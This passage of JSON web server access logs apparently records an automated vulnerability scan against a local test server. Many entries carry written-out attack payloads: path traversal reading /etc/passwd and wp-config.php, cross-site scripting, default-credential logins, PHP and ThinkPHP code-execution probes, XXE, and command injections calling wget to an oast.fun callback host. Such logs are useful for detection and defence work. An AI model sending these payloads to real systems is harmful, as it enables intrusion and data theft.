(KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/56 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/logoff.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"297MTy4L75ft3AEEnWsJq28SHg7.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://c9v8h88smpv8c1ig07h0b3wtxpdhxpwrd.oast.fun`","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi? HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"name=Admin&password=zabbix&autologin=1&enter=Sign+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A &test;\x0D\x0A \x0D\x0A \x0D\x0A com.jamfsoftware.jamfdistributionserver\x0D\x0A 1652459696\x0D\x0A \x0D\x0A 00000000-0000-0000-0000-000000000000\x0D\x0A com.jamfsoftware.jamf.distributionserverinventoryrequest\x0D\x0A \x0D\x0A 1999\x0D\x0A 1652459696\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 34\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /client HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /final/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_canteen&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/geojson?url=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apimanui/api-manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.173","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.175","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph_realtime.php?action=init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"username=guacadmin&password=guacadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-app.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"Language_S=../../Data/CONFIG/CasDbCnn.dat","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /casmain.xgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.179","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ioncube/loader-wizard.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=command&command=set_city_timezone&value=$(wget%20http://c9v8h8gsmpv8c1qg07h0xymaetnfatzfg.oast.fun)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /kindeditor/php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/read_body.php?mailbox=/etc/passwd&passed_id=1& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loader-wizard.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/setup.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/C%3a%2fwindows%2fsystem.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/system/assets/js/framework.combined-min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemstatus.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/icf/logoff?redirecturl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 